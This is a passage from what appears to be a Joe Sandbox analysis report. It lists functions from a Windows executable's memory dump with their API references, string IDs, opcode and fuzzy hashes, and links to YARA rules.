                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                        • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                        • Instruction ID: 3fb21da7511cd775c2c3ca35b3875cde41e40d22da597acbd6ea60344f182f72
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F0AF25B1870282EB10AF24A859739A320AF59760FC41675C57D8B1F0DFACD049C3A0
                                                                                                                                                                                                                        Function 00007FF7F2518678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                        • Instruction ID: b750d9aebd17cbc6c93b4750d7b4e3b991bb167016ad965e6cd225ea04402681
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6118F32F58E0342F7743928E45D37991406F65374F950AB4E97E0F6D68EADA841C1B0
                                                                                                                                                                                                                        Function 00007FF7F250A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A6BF
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A6DE
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A706
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A717
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A728
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                        • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                        • Instruction ID: 4070e17beaec4be25e2a7dc50dad51560cedd959b0c352294a405b1fae162beb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4611C021E0865341FB68FB655E51179E1515F483A0F9483B4D93E0B6D6FEACF401C7A0
                                                                                                                                                                                                                        Function 00007FF7F250A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                        • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                        • Instruction ID: cc6725ed7deafd46ffaf7bd10f63504a460a0e8a6915e9177cc2d3626f3169bd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B112821A0861341FF68FA650C121BDA2815F49360F9407B8DA3E0F2D2FDACB840C2A1
                                                                                                                                                                                                                        Function 00007FF7F25052B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                        • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                        • Instruction ID: 4c4d965ae334e5eea735eceaeceb8488a06c160fff8aaaf1468d7748cb200fee
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4991BF32A08A4781F721EE25D8513BDB691BB00B94FC84176DAAD473D5FEBCE845C3A0
                                                                                                                                                                                                                        Function 00007FF7F250EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                        • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                        • Instruction ID: e05ea64dc7658ef1133355f7f77d05c7b5a47bced7714f57b666e921e9a79871
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8581A572E0D20385F764EF25C920678B6A0EB21744FD580B5CA2A972D5FFADE801D7E1
                                                                                                                                                                                                                        Function 00007FF7F24FC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                        • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                        • Instruction ID: c283b7e89bff7e2eb95016b61def153c617c5282ffdd1b5b72fa678781b741aa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9518D36B1A6028ADB14EF25F444A79A791EB84B98F908131DA79477C8DFFCEC41C790
                                                                                                                                                                                                                        Function 00007FF7F24FE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                        • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                        • Instruction ID: 71e93d2c4864e979c22c9f9ae28f1800cba42d84eb2bf66848fe12f1b8fb45be
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75617032A08BC581D721AB15E4407AAF7A0FBC9794F444225EBAC07B95DFFCE590CB50
                                                                                                                                                                                                                        Function 00007FF7F24FE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                        • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                        • Instruction ID: dc117d2edb916acb2de01740960e46deac0fb3a6ccf696155ab65edb925f4f73
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED51AE32A0864686EB24AB119044278B6E0FBD4B96F944136DB7C47BD6CFFCE851C791
                                                                                                                                                                                                                        Function 00007FF7F24F7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF7F24F324C,?,?,00007FF7F24F3964), ref: 00007FF7F24F7642
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                        • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                        • Instruction ID: 7e4bd6e08d63c6d2ff0a088b98b374c30e33823be850a23282945950e58f3f24
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E31D621719AC585FB21AB15E8507BAA254FBC4BE0F804231EE7D47BC9DFACDA05C750
                                                                                                                                                                                                                        Function 00007FF7F24F2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                        • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                        • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                        • Instruction ID: f292b2dfb7995de627ce9c9cda825e34b3aea0127c1fcf93e4191e85caec3c21
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03118E72728A8581EB20AB10E461BA9B364FB88B88FD01135DA6C47684DFBCD605C790
                                                                                                                                                                                                                        Function 00007FF7F24F25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                        • API String ID: 1878133881-653037927
                                                                                                                                                                                                                        • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                        • Instruction ID: 41f03b2bacad80bd4bae639e0df5c9b7158be2f1315a71a07e47970a6669b881
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C119372628B4681FB20AF00F461BA9B364FF88B84FD01135DA6C47684DFBCDA05C790
                                                                                                                                                                                                                        Function 00007FF7F250B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                        • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                        • Instruction ID: 0a24f2f5aed08db6b2948f0eefe5c59cd53e72350f50757fef28760889463df8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DD14872B08A828AE710DF75D8902EC77B1FB44798B844275CE6E57BC9EE78D406C390
                                                                                                                                                                                                                        Function 00007FF7F250EC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                        • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                        • Instruction ID: c0d1a02d48549299a626670da131a1bb6b8de7f0325b609bac8aa91ef087be56
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3351F672F041268AEB14EF649D456BCB7A1AB10368FA00179DE3E57AE5EB78A401C750
                                                                                                                                                                                                                        Function 00007FF7F2504A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
